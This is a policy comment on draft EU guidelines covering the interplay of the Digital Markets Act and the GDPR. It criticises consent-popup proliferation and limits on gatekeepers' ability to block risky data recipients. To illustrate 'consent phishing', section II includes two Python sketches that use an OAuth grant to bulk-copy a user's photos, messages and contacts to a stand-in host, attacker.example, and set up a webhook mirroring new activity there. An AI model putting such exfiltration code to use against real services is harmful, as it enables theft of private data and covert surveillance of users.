Comments on the interplay of the EU DMA and the GDPR
The European Commission and the European Data Protection Board (EDPB) are preparing guidelines on the interplay of the Digital Markets Act (DMA) with the EU’s main privacy law, the General Data Protection Regulation (the GDPR). This is a topic I have covered here extensively, most recently in Apple’s new DMA criticism, EU-only feature delays, and what’s next; Debating the EU “pay or consent” decision against Meta; and EU DMA workshops: Google, Amazon, Apple, Meta, and Microsoft. While preparing the guidelines, the authorities asked for comments, and I prepared a response to that call, which the International Center for Law & Economics submitted yesterday. Below, you’ll find the contents of my comments.
Executive Summary
The approach adopted in the Draft Joint Guidelines will lead to a new proliferation of “consent popups” at a time when the Commission is seeking to address similar past failures of EU law regarding “cookie banners”. Users of digital services regulated under the DMA are likely to see further declines in the quality of their experience, and this could further damage the reputation of EU law. The DMA’s goals do not necessitate this approach, and we encourage both the EDPB and the Commission’s DMA Team to address the issue of consent in a more user-friendly way.
The guidelines disproportionately contradict the aims of EU data-protection and cybersecurity laws: they require that gatekeepers not warn users about clear and realistic risks that attend data portability (especially real-time and continuous portability), and they prevent gatekeepers from excluding known bad actors as recipients of user data. Effectively, the Draft Joint Guidelines would even mandate that gatekeepers support and enable campaigns by criminal actors or hostile foreign states to collect EU personal data, so long as those actors inform the gatekeeper—even falsely—that they are EU organisations and do not plan to transfer personal data outside the European Economic Area (EEA).
More generally, the guidelines depart from previously stated Commission policy, supported directly by the DMA, that gatekeepers have a duty to ensure DMA-implementation measures comply with other laws, including those on data protection and cybersecurity. Instead, the Draft Joint Guidelines propose to prohibit gatekeepers from implementing the most effective measures to achieve such compliance.
The guidelines interpret the DMA and the GDPR inconsistently. Without appropriate justification, some serious data-protection risks (e.g., those related to data portability) are not addressed as robustly as others (e.g., the sharing of search data).
The Draft Joint Guidelines also omit interoperability mandates under Article 6(7) DMA, incorrectly suggesting that such obligations pose no serious privacy issues. In fact, such issues include questions regarding the interplay between the DMA and the GDPR, as well as the ePrivacy Directive.
I. PROLIFERATION OF CONSENT REQUESTS (ARTICLES 5(2), 6(10) DMA)
The European Commission last month proposed legislation to address the problem of “cookie consent fatigue” by changing rules that are “outdated and inadequate for contemporary privacy and data needs”. It is therefore surprising to see the EDPB and the Commission’s DMA team pursue guidelines that would vastly increase the proliferation of consent requests with which EU users of digital services are bombarded.
The excessive reliance on ever-more consent requests, without any investigation of ways to reduce the need for them in accordance with the law, flies in the face of the current research on data protection. Even vocal critics of the ways that digital services use personal data recognize that the consent-centric approach has been a failure.
We should expect more from public authorities than the unthinking application of the consent paradigm, while failing to address the actual problems of data protection and security.
The Draft Joint Guidelines contribute to the disproportionate proliferation of consent requests in the following ways:
- Consent requests under Article 5(2) DMA (for the use of third-party data in online advertising, and for combining and cross-using personal data) are meant to be further subdivided into various “purposes”, such as “personalisation of content, personalisation of advertisements, and service development” (at [31]). While the guidelines direct gatekeepers to combine DMA and GDPR consent requests, avoiding the need to further double many of them, this does not address the increased consent fatigue that users will experience (at [42]).
- The Draft Joint Guidelines’ section on “ensuring user-friendly choices and consent designs” is a stark example of what has been dubbed the “nerd harder” approach (at [40]-[45]), without providing much actionable guidance on consent design. In its preoccupation with presenting choices in a “neutral” manner, the section fails to propose even the contours of a positive guiding example (e.g., must “yes” and “no” buttons have the same colour and contrast, even if it is basic user-experience practice to give them different colours, thus enabling rather than stifling choice?). Moreover, the section presents vague goals regarding user comprehension as a benchmark, merely paraphrasing the legal texts (at [45]). In doing so, it fails to adopt a realistic assessment of users’ level of interest in, and familiarity with, legal frameworks like the DMA and the GDPR.
- The guidelines are unclear regarding separate consent requests for processing special-category data under Article 5(2). They may be read as imposing a new, disproportionate requirement to seek such consent together with Article 5(2) DMA consent, even where there is no requirement to ask for it under the GDPR (e.g., when the gatekeeper has already obtained consent) (at [37]).
- The Draft Joint Guidelines acknowledge that users could be overwhelmed by a large number of requests from businesses for user-data portability under Article 6(10) DMA (“in particular where requests are repetitive or disruptive of the end user’s experience”) (at [172]). Even with regard to obvious cases of abuse, however, the guidelines fail to state clearly that gatekeepers can protect users from “repetitive or disruptive” requests. Instead, they offer a vague statement about “layered and intuitive consent interfaces”, which does not address whether gatekeepers can refuse to convey some consent requests.
II. ANTI-DATA PROTECTION AND SECURITY REQUIREMENTS (ARTICLES 6(9) AND 6(10) DMA)
The DMA’s provisions on data portability, in Articles 6(9) and 6(10), indisputably create data-protection and security risks. This is true not only for end users of DMA-regulated services, but also for any other person whose data happens to be in the user’s service account or—on the guidelines’ broad interpretation—even on the user’s device. These include new risks that users would neither expect nor understand. Consider the following example.
A user, currently logged into a major social-networking service (the Gatekeeper), encounters a viral third-party application promising a “Digital Nostalgia” service. The application claims to use artificial intelligence (AI) to scan the user’s history and generate a sentimental video montage of their friendships. To initiate this process, the user is forwarded from the third-party website to the Gatekeeper’s authorization screen.
Because the user is already authenticated on the platform, they do not need to enter credentials; they are immediately presented with a standard consent popup. This popup bears the social network’s familiar and trusted branding. It lists the permissions the third-party app requires, which include access to historical photos—including images shared only with close friends or romantic partners—private message archives, and contact lists.
Crucially, the user sees only the Gatekeeper’s familiar interface and instinctively applies the trust they have in that established platform to the unknown third party. The Gatekeeper’s consent screen effectively launders the legitimacy of an unvetted requestor. Conditioned by years of “consent fatigue” from cookie banners and terms-of-service updates, the user performs a cursory scan of the permission list—indistinguishable from dozens of benign requests they have approved before—and clicks “Allow” to access the promised feature.
In that single instant, the nefarious application triggers the data-portability interfaces mandated by the DMA. This grants the third-party actor immediate access to a massive trove of sensitive historical data, allowing them to exfiltrate years of private correspondence and intimate media without further interaction from the user. The application need not even deliver the promised nostalgia video, although this may be helpful to attract more victims. The Gatekeeper’s trusted UI effectively cloaks the risk of the unknown third-party requestor, creating a “Trojan Horse” effect where the ease of portability is weaponised against the user’s privacy.
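For readers less familiar with the mechanics of such delegated-access flows, the following Python sketch illustrates how little is required on the attacker’s side once the user clicks “Allow”. It is an illustration only: every endpoint, scope, and identifier below is hypothetical, since the DMA does not prescribe a concrete portability API and real gatekeeper interfaces will differ.

```python
import requests

# Hypothetical endpoints; the DMA prescribes no concrete API, so real
# gatekeeper interfaces will differ.
GATEKEEPER_TOKEN_URL = "https://gatekeeper.example/oauth/token"
PORTABILITY_API = "https://gatekeeper.example/dma/portability/v1"
ATTACKER_SINK = "https://attacker.example/collect"

def exfiltrate_after_consent(authorization_code: str) -> None:
    """Run by the malicious app once the user clicks 'Allow'."""
    # Step 1: exchange the one-time authorization code for an access
    # token covering every scope listed on the consent popup.
    token = requests.post(GATEKEEPER_TOKEN_URL, data={
        "grant_type": "authorization_code",
        "code": authorization_code,
        "client_id": "digital-nostalgia-app",     # hypothetical
        "client_secret": "attacker-held-secret",  # hypothetical
    }).json()["access_token"]
    headers = {"Authorization": f"Bearer {token}"}

    # Step 2: bulk-download historical data. The single consent click
    # covers all of these requests; the user is never re-engaged.
    for resource in ("photos", "messages", "contacts"):
        page = f"{PORTABILITY_API}/{resource}"
        while page:
            batch = requests.get(page, headers=headers).json()
            # Mirror each batch to attacker-controlled infrastructure.
            requests.post(ATTACKER_SINK, json=batch["items"])
            page = batch.get("next_page")  # follow pagination to the end
```

The point of the sketch is what is absent: after the initial click, the entire exchange is machine-to-machine, with no step at which the user is asked to confirm the scale of what is being copied.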
Under the requirement for “continuous and real-time” access, the threat extends beyond the user’s historical data. By granting this permission, the user has inadvertently authorised a persistent data stream—effectively a “live wire” connected to their account. Even after the user closes the “Digital Nostalgia” tab and forgets the application exists—not having received any ongoing notification that data sharing continues (at least for months)—the third-party service retains a valid access token or webhook subscription. This allows the nefarious actor to instantaneously receive copies of every new private message sent, every new photo uploaded, and every location tag created. The user is under active surveillance, with their ongoing digital life being mirrored to a malicious server.
This asymmetry compounds the harm: a single click grants access, but revocation—if the user even remembers the application exists—can only break the link for future data. Any data already exfiltrated is, of course, already in the attacker’s possession. The harvested information opens multiple vectors for exploitation: intimate images may be leveraged for sextortion; private messages mined for credentials, security questions, or blackmail material; and complete social graphs may be sold to data brokers, stalkers, or abusive ex-partners. All this stems from a single, momentary click on a consent form that took less time to approve than to read.
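The “live wire” and the revocation asymmetry described above can be pictured in the same hypothetical terms. Again, the endpoints and event names below are invented for illustration; no real gatekeeper API is being described.

```python
import requests
from flask import Flask, request

PORTABILITY_API = "https://gatekeeper.example/dma/portability/v1"  # hypothetical
ATTACKER_SINK = "https://attacker.example/collect"                 # hypothetical

def subscribe_to_live_stream(access_token: str) -> None:
    """Register a webhook so the gatekeeper pushes every new event.

    Under a 'continuous and real-time' mandate, delivery continues for
    as long as the token or subscription remains valid, even after the
    user has closed the app and forgotten that it exists.
    """
    requests.post(
        f"{PORTABILITY_API}/subscriptions",
        headers={"Authorization": f"Bearer {access_token}"},
        json={
            "events": ["message.created", "photo.uploaded", "location.tagged"],
            "callback_url": "https://attacker.example/webhook",
        },
    )

# Attacker-side receiver: each new private message, photo, or location
# tag is mirrored the moment the gatekeeper pushes it.
app = Flask(__name__)

@app.route("/webhook", methods=["POST"])
def receive_event():
    requests.post(ATTACKER_SINK, json=request.get_json())
    return "", 204

# Revoking the grant later merely invalidates the token and stops
# *future* deliveries; nothing in this flow can claw back the data
# already copied to ATTACKER_SINK.
```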
This textbook example of “consent phishing” bears some resemblance to the infamous Cambridge Analytica case. But much less information was available to Facebook apps like “This Is Your Digital Life” in 2014-15 than would be available under the DMA; importantly, there was no risk to private photos or messages. This is what is new about the risk: with a single click, an entire account and its most private contents could be sent to a third party (not to mention setting up ongoing surveillance).
Neither the European Commission nor any other EU body is currently conducting a public-information campaign to address this issue. This is despite the obvious fact that users of at least some DMA-regulated services have grown accustomed, with good reason, to trusting that the manufacturer or service provider would not allow them to harm themselves so easily. But this is now possible under the DMA.
Indeed, the Draft Joint Guidelines are generally dismissive of DMA-created risks to data protection and data security, which is surprising given the participation of the EDPB. Instead, they are preoccupied with interpreting the DMA’s explicit security and privacy provisions as narrowly as possible. The example detailed above illustrates two key problems with the guidelines:
- They require gatekeepers not to warn users about clear and realistic risks of data portability; and
- They prevent gatekeepers from excluding known bad actors as recipients of user data.
The guidelines state that “portability options and the wording used to describe them should be provided in a neutral and objective manner and should not nudge end users towards a specific choice” (at [126]). In other words, they require gatekeepers to act as if every choice to port data—even a choice that would expose an entire service account (with private messages, etc.) or all data on a user device—is equally neutral and safe, which is obviously not the case.
Moreover, the guidelines explicitly forbid gatekeepers from restricting third parties’ receipt of user data—even when, e.g., the third party has previously been fined or convicted for GDPR violations or is known to engage in practices like “consent phishing”. The Draft Joint Guidelines state (at [131]):
Gatekeepers should also not gather information pertaining to the authorised third party’s compliance measures under the GDPR, including potential administrative or judicial proceedings the third party has undergone in relation to compliance with the GDPR, or whether the third party has suffered breaches of data security in the past.
Gatekeepers would only be permitted to request “third parties’ identity details and information on whether, and to what extent” the data to be ported will involve transfers outside the EEA (to a country without an adequacy decision) (at [130]). The guidelines do not mention the possibility of gatekeepers being allowed to verify whether even this minimum information is provided truthfully. In effect, gatekeepers are entirely disarmed from protecting users, even where they know the user is about to become a victim of consent phishing or another kind of attack.
The shortsightedness of this approach is especially staggering given the current geopolitical situation and the well-known cyber operations of unfriendly states against the EU. The answer that the Draft Joint Guidelines provide to the issue of potential violations by third-party DMA beneficiaries is that such third parties are subject to the GDPR and to potential GDPR enforcement (see the next section). Obviously, data-protection authorities will deter no criminal or state actor, and it is trivially easy to concoct front businesses putatively based in the EU, especially when gatekeepers are barred from verifying any information.
III. PROHIBITING GATEKEEPERS FROM IMPLEMENTING THE MOST EFFECTIVE MEASURES FOR DATA PROTECTION AND CYBERSECURITY
As noted above, according to the Draft Joint Guidelines, any privacy or security violations by DMA-beneficiary third parties can only be policed by actors other than the gatekeepers. The key problem with this approach is that gatekeepers are, in at least some cases, best placed to perform this oversight. Indeed, prevention is likely to be the only intervention that matters, especially in cases like data exfiltration through “consent phishing”.
Effective approaches are needed, because data protection and security are exceedingly difficult to police in practice—both in terms of deterrence and in terms of enforcement against violators. It simply cannot be credibly maintained that the mere fact that the DMA’s beneficiaries are theoretically subject to the GDPR solves the issue of GDPR compliance. This is especially true for non-EU actors who aim to benefit from the DMA, either through legitimate but economically insignificant EU establishments, or by simply lying to gatekeepers about their identities.
In adopting this approach, the guidelines depart from previously stated Commission policy, supported directly by the DMA, that gatekeepers have a duty to ensure DMA implementation measures comply with other laws, including those on data protection and cybersecurity. For instance, Commissioner Margrethe Vestager stated in the European Parliament:
It is for the companies to decide how will they present their services, their operating system, how will they make them safe for you and comply with the DMA.
This aligns with Article 8(1) DMA, which states:
The gatekeeper shall ensure that the implementation of those measures complies with applicable law, in particular Regulation (EU) 2016/679, Directive 2002/58/EC, legislation on cyber security, consumer protection, product safety, as well as with the accessibility requirements.
The guidelines take note of this provision (at [88]), but add, in the context of Article 6(4):
At the same time, gatekeepers should not seek to instrumentalize their compliance with other applicable laws with a view to make their compliance with Article 6(4) DMA less effective. When selecting among several possible appropriate measures to comply with obligations stemming from other applicable laws, gatekeepers should select the measures that less adversely affect the pursuit of the objectives of Article 6(4) DMA, provided that they remain effective in ensuring compliance with those other applicable laws.
The legal interpretation implicit in this paragraph is highly questionable, as it appears to assume that DMA obligations take precedence over obligations from other EU legislation. One should ask whether the Draft Joint Guidelines apply the same logic to their interpretation of the DMA. In other words, when there are several ways to interpret the DMA and pursue its goals, do the guidelines choose those that less adversely affect the pursuit of other EU-law objectives, including minimising restrictions of the rights protected by the EU Charter? Little in the Draft Joint Guidelines suggests that such balancing has been conducted, or that the guidelines are defensible from this perspective.
Setting this aside, Article 8(1) is entirely absent from the guidelines’ section on the data-portability mandate under Article 6(10) DMA. The section on Article 6(9) references Article 8(1) in its discussion of authorised third parties, mentioning the GDPR’s principle of integrity and confidentiality (Article 5(1)(f) GDPR) and the requirement to ensure the security of personal-data processing (Article 32 GDPR) (at [129]). Notably, the principle of data minimisation (Article 5(1)(c) GDPR) is not mentioned.
In that discussion, the Draft Joint Guidelines make the already-quoted point that gatekeepers should neither gather information on GDPR compliance by third parties wanting to benefit from the DMA, nor act on any information about their noncompliance. That point is followed by this sentence (at [131]):
Such information would not necessarily be an indicator of future compliance or the security of an application or related processing, and as such is not strictly necessary to comply with the gatekeeper’s own responsibility under the GDPR.
This reveals two important assumptions implicitly made in the guidelines, detailed in the next two subsections.
A. Gatekeepers Only Responsible for Own GDPR Compliance
First, the guidelines assume that Article 8(1) DMA concerns only “the gatekeeper’s own responsibility under the GDPR”. This is not the only possible reading of Article 8(1), and the guidelines provide no argument for why this reading should be adopted. On an alternative reading, which aligns with previous Commission policy as stated by Commissioner Vestager, gatekeepers are meant to ensure that DMA implementation measures comply with other laws, full stop.
In other words, it is the gatekeepers’ responsibility to ensure—to the extent they can—that implementation measures do not lead to noncompliance with those other laws. It is true that gatekeepers cannot fully control, for instance, what third parties do with ported user data. But this does not mean that they should not at least implement technical and organisational measures (e.g., contractual measures) to safeguard compliance to the extent feasible. They are, after all, best placed to adopt such safeguards.
If gatekeepers do not do so, then DMA-created risks like the “consent phishing” example from the previous section will meet with no effective prevention. In other words, gatekeepers are the lowest-cost avoiders of harm. It is hard to see how preventing them from performing a necessary service that they are best placed to provide could be attributed to a rational choice by the EU legislature.
What is most puzzling is that the Draft Joint Guidelines do recognise this rather obvious point, but only in the section on search-engine data sharing under Article 6(11) DMA. There, the guidelines explicitly contemplate an implementing act that (at [189]):
…may include an obligation for gatekeepers to contractually impose measures, where appropriate, on eligible third-party undertakings as a condition to access the data. Contractual requirements may, among others, limit onward sharing of the data received by eligible third-party undertakings. The implementing act may also impose specific monitoring obligations on the gatekeeper and also specify appropriate measures that gatekeepers must take in case of an established violation by third-party undertakings providing online search engines of requirements set out in the contract. Such measures may include requiring the gatekeeper to notify the competent data protection supervisory authority in case of an alleged breach of the GDPR, cease sharing data with the third-party undertaking providing an online search engine, and providing it with the contractual right to order the third party to delete any data it received from the gatekeeper.
We will return in the next section to this inconsistency in how the guidelines treat Article 6(11) and other provisions.
B. GDPR Applies Only to the Extent ‘Strictly Necessary’
The other revealed assumption in the Draft Joint Guidelines is that gatekeepers’ responsibility under the GDPR should be interpreted narrowly, placing the DMA’s goals above the GDPR’s goals. The sentence from the guidelines cited above restricts the GDPR’s application in a way that has no basis in the DMA: gatekeepers are only allowed to comply with the GDPR to the extent that this is “strictly necessary” (at [131]). And not just “strictly necessary” as that standard is typically understood, but in some qualified, extreme sense.
In fact, it is hard to see the limiting principle of this restriction, given how facially unreasonable the provided example is. The guidelines reason that, because third parties’ previous GDPR violations are not always predictive of future GDPR violations (“would not necessarily be an indicator”), there can never be a situation where prior violations indicate a strong likelihood of future violations. More precisely, there can never be a situation where knowledge of prior violations would permit a gatekeeper to better comply with the GDPR by refusing to transfer user personal data (likely including special categories of data) to such third parties. This is extremely surprising, given the EDPB’s co-authorship of the guidelines.
As far as the DMA is concerned, it states that it applies “without prejudice” to the GDPR (see, e.g., recital 12). The DMA contains no general qualification that laws with respect to which it remains “without prejudice” apply only to the “strictly necessary” extent, much less in the extreme version suggested by the cited sentence.
To read the final two sections on the inconsistent interpretation of the DMA and the GDPR and on the omission of interoperability mandates (Article 6(7) DMA) go to the ICLE website.